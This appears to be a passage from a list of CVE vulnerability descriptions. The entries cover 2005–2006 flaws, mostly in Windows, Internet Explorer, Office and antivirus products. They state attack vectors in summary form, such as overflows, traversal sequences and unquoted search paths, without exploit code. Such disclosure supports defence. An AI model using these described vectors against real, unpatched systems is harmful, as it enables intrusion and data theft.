CVE-2005-2006. [CVE-2006-0611] Directory traversal vulnerability in compose.pl in @Mail 4.3 and earlier for Windows allows remote attackers to upload arbitrary files to arbitrary locations via a .. (dot dot) in the unique parameter. [CVE-2006-0585] jscript.dll in Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service (application crash) via a Shockwave Flash object that contains ActionScript code that calls VBScript, which in turn calls the Javascript document.write function, which triggers a null dereference. [CVE-2006-0564] Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field. [CVE-2006-0544] urlmon.dll in Microsoft Internet Explorer 7.0 beta 2 (aka 7.0.5296.0) allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a BGSOUND element with its SRC attribute set to "file://" followed by a large number of "-" (dash of hyphen) characters. [CVE-2006-0488] The VDM (Virtual DOS Machine) emulation environment for MS-DOS applications in Windows 2000, Windows XP SP2, and Windows Server 2003 allows local users to read the first megabyte of memory and possibly obtain sensitive information, as demonstrated by dumper.asm. [CVE-2006-0376] The 802.11 wireless client in certain operating systems including Windows 2000, Windows XP, and Windows Server 2003 does not warn the user when (1) it establishes an association with a station in ad hoc (aka peer-to-peer) mode or (2) a station in ad hoc mode establishes an association with it, which allows remote attackers to put unexpected wireless communication into place. [CVE-2006-0368] Cisco CallManager 3.2 and earlier, 3.3 before 3.3(5)SR1, 4.0 before 4.0(2a)SR2c, and 4.1 before 4.1(3)SR2 allow remote attackers to (1) cause a denial of service (CPU and memory consumption) via a large number of open TCP connections to port 2000 and (2) cause a denial of service (fill the Windows Service Manager communication queue) via a large number of TCP connections to port 2001, 2002, or 7727. [CVE-2006-0363] The "Remember my Password" feature in MSN Messenger 7.5 stores passwords in an encrypted format under the HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds registry key, which might allow local users to obtain the original passwords via a program that calls CryptUnprotectData, as demonstrated by the "MSN Password Recovery.exe" program. NOTE: it could be argued that local-only password recovery is inherently insecure because the decryption methods and keys must be stored somewhere on the local system, and are thus inherently accessible with varying degrees of effort. Perhaps this issue should not be included in CVE. [CVE-2006-0338] Multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allow remote attackers to hide arbitrary files and data via malformed (1) RAR and (2) ZIP archives, which are not properly scanned. [CVE-2006-0337] Buffer overflow in multiple F-Secure Anti-Virus products and versions for Windows and Linux, including Anti-Virus for Windows Servers 5.52 and earlier, Internet Security 2004, 2005 and 2006, and Anti-Virus for Linux Servers 4.64 and earlier, allows remote attackers to execute arbitrary code via crafted ZIP archives. [CVE-2006-0255] Unquoted Windows search path vulnerability in Check Point VPN-1 SecureClient might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when SecureClient attempts to launch the Sr_GUI.exe program. [CVE-2006-0229] Unquoted Windows search path vulnerability in Wehntrust might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run when Wehntrust creates the autostart key. [CVE-2006-0187] By design, Microsoft Visual Studio 2005 automatically executes code in the Load event of a user-defined control (UserControl1_Load function), which allows user-assisted attackers to execute arbitrary code by tricking the user into opening a malicious Visual Studio project file. [CVE-2006-0166] Symantec Norton SystemWorks and SystemWorks Premier 2005 and 2006 stores temporary copies of files in the Norton Protected Recycle Bin NProtect directory, which is hidden from the FindFirst and FindNext Windows APIs and allows remote attackers to hide arbitrary files from virus scanners and other products. [CVE-2006-0106] gdi/driver.c and gdi/printdrv.c in Wine 20050930, and other versions, implement the SETABORTPROC GDI Escape function call for Windows Metafile (WMF) files, which allows attackers to execute arbitrary code, the same vulnerability as CVE-2005-4560 but in a different codebase. [CVE-2006-0105] PostgreSQL 8.0.x before 8.0.6 and 8.1.x before 8.1.2, when running on Windows, allows remote attackers to cause a denial of service (postmaster exit and no new connections) via a large number of simultaneous connection requests. [CVE-2006-0097] Stack-based buffer overflow in the create_named_pipe function in libmysql.c in PHP 4.3.10 and 4.4.x before 4.4.3 for Windows allows attackers to execute arbitrary code via a long (1) arg_host or (2) arg_unix_socket argument, as demonstrated by a long named pipe variable in the host argument to the mysql_connect function. [CVE-2006-0057] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to bypass the Kill bit settings for dangerous ActiveX controls via unknown vectors involving crafted HTML, which can expose the browser to attacks that would otherwise be prevented by the Kill bit setting. NOTE: CERT/CC claims that MS05-054 fixes this issue, but it is not described in MS05-054. [CVE-2006-0033] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted PNG image that triggers memory corruption when it is parsed. [CVE-2006-0031] Stack-based buffer overflow in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed record with a modified length value, which leads to memory corruption. [CVE-2006-0030] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed graphic, which leads to memory corruption. [CVE-2006-0029] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed description, which leads to memory corruption. [CVE-2006-0028] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via a BIFF parsing format file containing malformed BOOLERR records that lead to memory corruption, probably involving invalid pointers. [CVE-2006-0027] Unspecified vulnerability in Microsoft Exchange allows remote attackers to execute arbitrary code via e-mail messages with crafted (1) vCal or (2) iCal Calendar properties. [CVE-2006-0026] Buffer overflow in Microsoft Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows local and possibly remote attackers to execute arbitrary code via crafted Active Server Pages (ASP). [CVE-2006-0022] Unspecified vulnerability in Microsoft PowerPoint in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP1 and SP2, Office 2004 for Mac, and v. X for Mac allows user-assisted attackers to execute arbitrary code via a PowerPoint document with a malformed record, which triggers memory corruption. [CVE-2006-0015] Cross-site scripting (XSS) vulnerability in _vti_bin/_vti_adm/fpadmdll.dll in Microsoft FrontPage Server Extensions 2002 and SharePoint Team Services allows remote attackers to inject arbitrary web script or HTML, then leverage the attack to execute arbitrary programs or create new accounts, via the (1) operation, (2) command, and (3) name parameters. [CVE-2006-0009] Buffer overflow in Microsoft Office 2000 SP3, XP SP3, and other versions and packages, allows user-assisted attackers to execute arbitrary code via a routing slip that is longer than specified by the provided length field, as exploited by malware such as TROJ_MDROPPER.BH and Trojan.PPDropper.E in attacks against PowerPoint. [CVE-2006-0007] Buffer overflow in GIFIMP32.FLT, as used in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via a crafted GIF image that triggers memory corruption when it is parsed. [CVE-2006-0004] Microsoft PowerPoint 2000 in Office 2000 SP3 has an interaction with Internet Explorer that allows remote attackers to obtain sensitive information via a PowerPoint presentation that attempts to access objects in the Temporary Internet Files Folder (TIFF). [CVE-2006-0003] Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors. [CVE-2006-0002] Unspecified vulnerability in Microsoft Outlook 2000 through 2003, Exchange 5.0 Server SP2 and 5.5 SP4, Exchange 2000 SP3, and Office allows remote attackers to execute arbitrary code via an e-mail message with a crafted Transport Neutral Encapsulation Format (TNEF) MIME attachment, related to message length validation. [CVE-2006-0001] Stack-based buffer overflow in Microsoft Publisher 2000 through 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted PUB file, which causes an overflow when parsing fonts. [CVE-2005-4827] Internet Explorer 6.0, and possibly other versions, allows remote attackers to bypass the same origin security policy and make requests outside of the intended domain by calling open on an XMLHttpRequest object (Microsoft.XMLHTTP) and using tab, newline, and carriage return characters within the first argument (method name), which is supported by some proxy servers that convert tabs to spaces. NOTE: this issue can be leveraged to conduct referer spoofing, HTTP Request Smuggling, and other attacks. [CVE-2005-4812] The SISCO OSI stack for Windows, as used by MMS-EASE 7.10 and earlier, AX-S4 MMS 5.01 and earlier, AX-S4 ICCP 3.0103 and earlier, and the ICCP Toolkit for MMS-EASE 4.10 and earlier, allows remote attackers to cause a denial of service (process crash) via certain network traffic, as demonstrated using a Nessus scan. [CVE-2005-4810] Microsoft Internet Explorer 7.0 Beta3 and earlier allows remote attackers to cause a denial of service (crash) via a "text/html" HTML Content-type header sent in response to an XMLHttpRequest (AJAX). [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto. [CVE-2005-4697] The Microsoft Wireless Zero Configuration system (WZCS) allows local users to access WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key via certain calls to the WZCQueryInterface API function in wzcsapi.dll. [CVE-2005-4696] The Microsoft Wireless Zero Configuration system (WZCS) stores WEP keys and pair-wise Master Keys (PMK) of the WPA pre-shared key in plaintext in memory of the explorer process, which allows attackers with access to process memory to steal the keys and access the network. [CVE-2005-4679] Internet Explorer 6 for Windows XP Service Pack 2 allows remote attackers to spoof the URL in the status bar via the title in an image in a link to a trusted site within a form to the malicious site. [CVE-2005-4579] Multiple HTTP response splitting vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary HTTP headers via unknown attack vectors in an unspecified input form. [CVE-2005-4578] Multiple SQL injection vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to execute arbitrary SQL commands via unknown attack vectors in an unspecified input form. [CVE-2005-4577] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Business Logic - Container (BLC) P-2443-9114 01-00 through 02-06 on Windows, and P-1M43-9111 01-01 through 02-00 on AIX, allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors in an unspecified input form. [CVE-2005-4505] Unquoted Windows search path vulnerability in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, which is run by naPrdMgr.exe when it attempts to execute EntVUtil.EXE under an unquoted "Program Files" path. [CVE-2005-4417] The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, as installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly other devices, sets null Authentication and Authorization values, which allows remote attackers to send arbitrary audio and possibly eavesdrop using the microphone via the Hands Free Audio Gateway and Headset profile. [CVE-2005-4210] Opera before 8.51, when running on Windows with Input Method Editor (IME) installed, allows remote attackers to cause a denial of service (persistent application crash) by bookmarking a site with a long title. [CVE-2005-4131] Unspecified vulnerability in Microsoft Excel 2000, 2002, and 2003, in Microsoft Office 2000 SP3 and other packages, allows user-assisted attackers to execute arbitrary code via an Excel file with a malformed range, which could lead to memory corruption involving an argument to the msvcrt.memmove function, aka "Brand new Microsoft Excel Vulnerability," as originally placed for sale on eBay as item number 7203336538. [CVE-2005-4089] Microsoft Internet Explorer allows remote attackers to bypass cross-domain security restrictions and obtain sensitive information by using the @import directive to download files from other domains that are not valid Cascading Style Sheets (CSS) files, as demonstrated using Google Desktop, aka "CSSXSS" and "CSS Cross-Domain Information Disclosure Vulnerability." [CVE-2005-3983] Unknown vulnerability in the login page for HP Systems Insight Manager (SIM) 4.0 and 4.1, when accessed by Microsoft Internet Explorer with the MS04-025 patch, leads to a denial of service (browser hang). NOTE: although the advisory is vague, this issue does not appear to involve an attacker at all. If not, then this issue is not a vulnerability. [CVE-2005-3889] Gadu-Gadu 7.20 allows remote attackers to cause a denial of service via multiple DCC packets with a code of 6 or 7, which triggers a large number of popup windows to the user and creates a large number of threads. [CVE-2005-3886] Unspecified vulnerability in Cisco Security Agent (CSA) 4.5.0 and 4.5.1 agents, when running on Windows systems, allows local users to bypass protections and gain system privileges by executing certain local software. [CVE-2005-3663] Unquoted Windows search path vulnerability in Kaspersky Anti-Virus 5.0 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-3643] IBM DB2 Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account without supplying a password. [CVE-2005-3642] IBM Informix Dynamic Database server running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication and log on to the guest account by supplying an invalid username. [CVE-2005-3641] Oracle Databases running on Windows XP with Simple File Sharing enabled, allows remote attackers to bypass authentication by supplying a valid username. [CVE-2005-3591] Macromedia Flash plugin (1) Flash.ocx 7.0.19.0 (Windows) and earlier and (2) libflashplayer.so before 7.0.25.0 (Unix) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via parameters to the ActionDefineFunction ActionScript call in a SWF file, which causes an improper memory access condition, a different vulnerability than CVE-2005-2628. [CVE-2005-3568] db2fmp process in IBM DB2 Content Manager before 8.2 Fix Pack 10 allows local users to cause a denial of service (CPU consumption) by importing a corrupted Microsoft Excel file, aka "CORRUPTED EXEL FILE WILL CAUSE TEXT SEARCH PROCESS LOOPING." [CVE-2005-3483] Buffer overflow in GO-Global for Windows 3.1.0.3270 and earlier allows remote attackers to execute arbitrary code via a data block that is longer than the specified data block size. [CVE-2005-3468] Directory traversal vulnerability in F-Secure Anti-Virus for Microsoft Exchange 6.40 and Internet Gatekeeper 6.40 to 6.42 allows limited remote attackers to bypass Web Console authentication and read files. [CVE-2005-3421] estcmd in Hyper Estraier 1.0.1 on Windows systems allows remote attackers to read unauthorized files via a crafted search request for a filename that contains Unicode characters. [CVE-2005-3312] The HTML rendering engine in Microsoft Internet Explorer 6.0 allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML in corrupted images and other files such as .GIF, JPG, and WAV, which is rendered as HTML when the user clicks on the link, even though the web server response and file extension indicate that it should be treated as a different file type. [CVE-2005-3284] Multiple buffer overflows in AhnLab V3 AntiVirus V3Pro 2004 before 6.0.0.488, V3Net for Windows Server 6.0 before 6.0.0.488, and MyV3, with compressed file scanning enabled, allow remote attackers to execute arbitrary code via crafted (1) ALZ, (2) UUE, or (3) XXE archives. [CVE-2005-3267] Integer overflow in Skype client before 1.4.x.84 on Windows, before 1.3.x.17 on Mac OS, before 1.2.x.18 on Linux, and 1.1.x.6 and earlier allows remote attackers to cause a denial of service (crash) via crafted network data with a large Object Counter value, which leads to a resultant heap-based buffer overflow. [CVE-2005-3265] Buffer overflow in Skype for Windows 1.1.x.0 through 1.4.x.83 allows remote attackers to execute arbitrary code via (1) callto:// and (2) skype:// links, or (3) a non-standard VCARD, possibly due to an underlying error in the SysUtils.WideFmtStr Delphi routine. [CVE-2005-3240] Race condition in Microsoft Internet Explorer allows user-assisted attackers to overwrite arbitrary files and possibly execute code by tricking a user into performing a drag-and-drop action from certain objects, such as file objects within a folder view, then predicting the drag action, and re-focusing to a malicious window. [CVE-2005-3182] Buffer overflow in the HTTP management interface for GFI MailSecurity 8.1 allows remote attackers to execute arbitrary code via long headers such as (1) Host and (2) Accept in HTTP requests. NOTE: the vendor suggests that this issues is "in an underlying Microsoft technology" which, if true, could mean that the overflow affects other products as well. [CVE-2005-3156] Directory traversal vulnerability in printfaq.php in EasyGuppy (Guppy for Windows) 4.5.4 and 4.5.5 allows remote attackers to read arbitrary files via ".." sequences in the pg parameter, which is cleansed for XSS but not directory traversal. [CVE-2005-3077] Microsoft Internet Explorer 5.2.3 for Mac OS allows remote attackers to cause a denial of service (crash) via a web page with malformed attributes in a BGSOUND tag, possibly involving double-quotes in an about: URI. [CVE-2005-3059] Multiple unspecified vulnerabilities in Opera 8.50 on Linux and Windows have unknown impact and attack vectors, related to (1) " handling of must-revalidate cache directive for HTTPS pages" or (2) a "display issue with cookie comment encoding." [CVE-2005-3041] Unspecified "drag-and-drop vulnerability" in Opera Web Browser before 8.50 on Windows allows "unintentional file uploads." [CVE-2005-3030] Directory traversal vulnerability in the archive decompression library in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to write arbitrary files via a .. (dot dot) in the filename in a compressed archive. [CVE-2005-3029] Stack-based buffer overflow in AhnLab V3Pro 2004 build 6.0.0.383, V3 VirusBlock 2005 build 6.0.0.383, and V3Net for Windows Server 6.0 build 6.0.0.383 allows remote attackers to execute arbitrary code via a long filname in an ACE archive. [CVE-2005-2986] The v3flt2k.sys driver in AhnLab V3Pro 2004 Build 6.0.0.383, V3 VirusBlock 2005 Build 6.0.0.383, V3Net for Windows Server 6.0 Build 6.0.0.383 does not properly validate the source of the DeviceIoControl commands, which allows remote attackers to gain privileges. [CVE-2005-2957] Stack-based buffer overflow in AVIRA Desktop for Windows 1.00.00.68 with AVPACK32.DLL 6.31.0.3, when archive scanning is enabled, allows remote attackers to execute arbitrary code via a long filename in an ACE archive. [CVE-2005-2939] Unquoted Windows search path vulnerability in VMWare Workstation 5.0.0 build-13124 might allow local users to gain privileges via a malicious "program.exe" file in the C: folder. [CVE-2005-2938] Unquoted Windows search path vulnerability in iTunesHelper.exe in iTunes 4.7.1.30 and iTunes 5 for Windows might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2936] Unquoted Windows search path vulnerability in RealNetworks RealPlayer 10.5 6.0.12.1040 through 6.0.12.1348, RealPlayer 10, RealOne Player v2, RealOne Player v1, and RealPlayer 8 before 20060322 might allow local users to gain privileges via a malicious C:\program.exe file. [CVE-2005-2858] The Fetch.FetchContact.1 ActiveX control (Fetch.dll) for Rediff Bol 7.0 allows remote attackers to read the Windows Address Book via the FullAddressBook method. [CVE-2005-2831] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, aka a variant of the "COM Object Instantiation Memory Corruption Vulnerability," a different vulnerability than CVE-2005-2127. [CVE-2005-2830] Microsoft Internet Explorer 5.01, 5.5, and 6, when using an HTTPS proxy server that requires Basic Authentication, sends URLs in cleartext, which allows remote attackers to obtain sensitive information, aka "HTTPS Proxy Vulnerability." [CVE-2005-2829] Multiple design errors in Microsoft Internet Explorer 5.01, 5.5, and 6 allow user-assisted attackers to execute arbitrary code by (1) overlaying a malicious new window above a file download box, then (2) using a keyboard shortcut and delaying the display of the file download box until the user hits a shortcut that activates the "Run" button, aka "File Download Dialog Box Manipulation Vulnerability." [CVE-2005-2827] The thread termination routine in the kernel for Windows NT 4.0 and 2000 (NTOSKRNL.EXE) allows local users to modify kernel memory and execution flow via steps in which a terminating thread causes Asynchronous Procedure Call (APC) entries to free the wrong data, aka the "Windows Kernel Vulnerability." [CVE-2005-2804] Integer overflow in the registry parsing code in GroupWise 6.5.3, and possibly earlier version, allows remote attackers to cause a denial of service (application crash) via a large TCP/IP port in the Windows registry key. [CVE-2005-2771] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) processes access and deny lists in a case-sensitive manner, when previous versions were case-insensitive, which might allow remote attackers to bypass intended restrictions and login to accounts that should be denied. [CVE-2005-2770] WRQ Reflection for Secure IT Windows Server 6.0 (formerly known as F-Secure SSH server) does not properly handle when the Windows Administrator or Guest accounts are renamed after SSH key authentication has been configured, which allows remote attackers to use the original names during login. [CVE-2005-2765] The user interface in the Windows Firewall does not properly display certain malformed entries in the Windows Registry, which makes it easier for attackers with administrator privileges to hide activities if the administrator only uses the Windows Firewall interface to monitor exceptions. NOTE: the vendor disputes this issue, saying that since administrative privileges are already required, it is not a vulnerability. CVE has not yet formally decided if such "information hiding" issues should be included. [CVE-2005-2726] Directory traversal vulnerability in Home Ftp Server 1.0.7 allows remote authenticated users to read arbitrary files via "C:\" (Windows drive letter) sequences in commands such as (1) LIST or (2) RETR. [CVE-2005-2707] Firefox before 1.0.7 and Mozilla Suite before 1.7.12 allows remote attackers to spawn windows without user interface components such as the address and status bar, which could be used to conduct spoofing or phishing attacks. [CVE-2005-2678] Microsoft IIS 5.1 and 6 allows remote attackers to spoof the SERVER_NAME variable to bypass security checks and conduct various attacks via a GET request with an http://localhost URI, which makes it appear as if the request is coming from localhost. [CVE-2005-2611] VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server. [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character. [CVE-2005-2572] MySQL, when running on Windows, allows remote authenticated users with insert privileges on the mysql.func table to cause a denial of service (server hang) and possibly execute arbitrary code via (1) a request for a non-library file, which causes the Windows LoadLibraryEx function to block, or (2) a request for a function in a library that has the XXX_deinit or XXX_init functions defined but is not tailored for mySQL, such as jpeg1x32.dll and jpeg2x32.dll. [CVE-2005-2551] Buffer overflow in dhost.exe in iMonitor for Novell eDirectory 8.7.3 on Windows allows attackers to cause a denial of service (crash) and obtain access to files via unknown vectors. [CVE-2005-2502] Buffer overflow in AppKit for Mac OS X 10.3.9 and 10.4.2, as used in applications such as TextEdit, allows external user-assisted attackers to execute arbitrary code via a crafted Microsoft Word file. [CVE-2005-2429] Firefox, when opening Microsoft Word documents, does not properly set the permissions on shared sections, which allows remote attackers to write arbitrary data to open applications in Microsoft Office. [CVE-2005-2371] Directory traversal vulnerability in Oracle Reports 6.0, 6i, 9i, and 10g allows remote attackers to overwrite arbitrary files via (1) "..", (2) Windows drive letter (C:), and (3) absolute path sequences in the desname parameter. NOTE: this issue was probably fixed by REP06 in CPU Jan 2006, in which case it overlaps CVE-2006-0289. [CVE-2005-2308] The JPEG decoder in Microsoft Internet Explorer allows remote attackers to cause a denial of service (CPU consumption or crash) and possibly execute arbitrary code via certain crafted JPEG images, as demonstrated using (1) mov_fencepost.jpg, (2) cmp_fencepost.jpg, (3) oom_dos.jpg, or (4) random.jpg. [CVE-2005-2304] Microsoft MSN Messenger 9.0 and Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) via an image with an ICC Profile with a large Tag Count. [CVE-2005-2274] Microsoft Internet Explorer 6.0 does not clearly associate a Javascript dialog box with the web page that generated it, which allows remote attackers to spoof a dialog box from a trusted site and facilitates phishing attacks, aka the "Dialog Origin Spoofing Vulnerability." [CVE-2005-2226] Microsoft Outlook Express 6.0 leaks the default news server account when a user responds to a "watched" conversation thread, which could allow remote attackers to obtain sensitive information. [CVE-2005-2225] Microsoft MSN Messenger allows remote attackers to cause a denial of service via a plaintext message containing the ".pif" string, which is interpreted as a malicious file extension and causes users to be kicked from a group conversation. NOTE: it has been reported that Gaim is also affected, so this may be an issue in the protocol or MSN servers. [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2150] Windows NT 4.0 and Windows 2000 before URP1 for Windows 2000 SP4 does not properly prevent NULL sessions from accessing certain alternate named pipes, which allows remote attackers to (1) list Windows services via svcctl or (2) read eventlogs via eventlog. [CVE-2005-2146] SSH Tectia Server 4.3.1 and earlier, and SSH Secure Shell for Windows Servers, uses insecure permissions when generating the Secure Shell host identification key, which allows local users to access the key and spoof the server. [CVE-2005-2143] Microsoft Front Page allows attackers to cause a denial of service (crash) via a crafted style tag in a web page. [CVE-2005-2127] Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not intended for use within Internet Explorer, as originally demonstrated using the (1) DDS Library Shape Control (Msdds.dll) COM object, and other objects including (2) Blnmgrps.dll, (3) Ciodm.dll, (4) Comsvcs.dll, (5) Danim.dll, (6) Htmlmarq.ocx, (7) Mdt2dd.dll (as demonstrated using a heap corruption attack with uninitialized memory), (8) Mdt2qd.dll, (9) Mpg4ds32.ax, (10) Msadds32.ax, (11) Msb1esen.dll, (12) Msb1fren.dll, (13) Msb1geen.dll, (14) Msdtctm.dll, (15) Mshtml.dll, (16) Msoeacct.dll, (17) Msosvfbr.dll, (18) Mswcrun.dll, (19) Netshell.dll, (20) Ole2disp.dll, (21) Outllib.dll, (22) Psisdecd.dll, (23) Qdvd.dll, (24) Repodbc.dll, (25) Shdocvw.dll, (26) Shell32.dll, (27) Soa.dll, (28) Srchui.dll, (29) Stobject.dll, (30) Vdt70.dll, (31) Vmhelper.dll, and (32) Wbemads.dll, aka a variant of the "COM Object Instantiation Memory Corruption vulnerability." [CVE-2005-2126] The FTP client in Windows XP SP1 and Server 2003, and Internet Explorer 6 SP1 on Windows 2000 SP4, when "Enable Folder View for FTP Sites" is enabled and the user manually initiates a file transfer, allows user-assisted, remote FTP servers to overwrite files in arbitrary locations via crafted filenames. [CVE-2005-2124] Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability." [CVE-2005-2123] Multiple integer overflows in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allow remote attackers to execute arbitrary code via crafted Windows Metafile (WMF) and Enhanced Metafile (EMF) format images that lead to heap-based buffer overflows, as demonstrated using MRBP16::bCheckRecord. [CVE-2005-2119] The MIDL_user_allocate function in the Microsoft Distributed Transaction Coordinator (MSDTC) proxy (MSDTCPRX.DLL) allocates a 4K page of memory regardless of the required size, which allows attackers to overwrite arbitrary memory locations using an incorrect size value that is provided to the NdrAllocate function, which writes management data to memory outside of the allocated buffer. [CVE-2005-2089] Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling." [CVE-2005-2087] Internet Explorer 5.01 SP4 up to 6 on various Windows operating systems, including IE 6.0.2900.2180 on Windows XP, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a web page with embedded CLSIDs that reference certain COM objects that are not ActiveX controls, as demonstrated using the JVIEW Profiler (Javaprxy.dll). NOTE: the researcher says that the vendor could not reproduce this problem. [CVE-2005-2080] Unknown vulnerability in Remote Agent for Windows Servers (RAWS) in VERITAS Backup Exec 9.0 through 10.0 for Windows, and 9.0.4019 through 9.1.307 for NetWare, allows remote attackers to gain privileges by copying the handle for the server. [CVE-2005-2079] Heap-based buffer overflow in the Admin Plus Pack Option for VERITAS Backup Exec 9.0 through 10.0 for Windows Servers allows remote attackers to execute arbitrary code. [CVE-2005-1970] Symantec pcAnywhere 10.5x and 11.x before 11.5, with "Launch with Windows" enabled, allows local users with physical access to execute arbitrary commands via the Caller Properties feature. [CVE-2005-1935] Heap-based buffer overflow in the BERDecBitString function in Microsoft ASN.1 library (MSASN1.DLL) allows remote attackers to execute arbitrary code via nested constructed bit strings, which leads to a realloc of a non-null pointer and causes the function to overwrite previously freed memory, as demonstrated using a SPNEGO token with a constructed bit string during HTTP authentication, and a different vulnerability than CVE-2003-0818. NOTE: the researcher has claimed that MS:MS04-007 fixes this issue. [CVE-2005-1929] Multiple heap-based buffer overflows in (1) isaNVWRequest.dll and (2) relay.dll in Trend Micro ServerProtect Management Console 5.58 and earlier, as used in Control Manager 2.5 and 3.0 and Damage Cleanup Server 1.1, allow remote attackers to execute arbitrary code via "wrapped" length values in Chunked transfer requests. NOTE: the original report suggests that the relay.dll issue is related to a problem in which a Microsoft Foundation Classes (MFC) static library returns invalid values under heavy load. As such, this might not be a vulnerability in Trend Micro's product. [CVE-2005-1928] Trend Micro ServerProtect EarthAgent for Windows Management Console 5.58 and possibly earlier versions, when running with Trend Micro Control Manager 2.5 and 3.0, and Damage Cleanup Server 1.1, allows remote attackers to cause a denial of service (CPU consumption) via a flood of crafted packets with a certain "magic value" to port 5005, which also leads to a memory leak. [CVE-2005-1907] The ISA Firewall service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (Wspsrv.exe crash) via a large amount of SecureNAT network traffic. [CVE-2005-1905] The klif.sys driver in Kaspersky Labs Anti-Virus 5.0.227, 5.0.228, and 5.0.335 on Windows 2000 allows local users to gain privileges by modifying certain critical code addresses that are later accessed by privileged programs. [CVE-2005-1829] Microsoft Internet Explorer 6 SP2 allows remote attackers to cause a denial of service (infinite loop and application crash) via two embedded files that call each other. [CVE-2005-1794] Microsoft Terminal Server using Remote Desktop Protocol (RDP) 5.2 stores an RSA private key in mstlsapi.dll and uses it to sign a certificate, which allows remote attackers to spoof public keys of legitimate servers and conduct man-in-the-middle attacks. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be 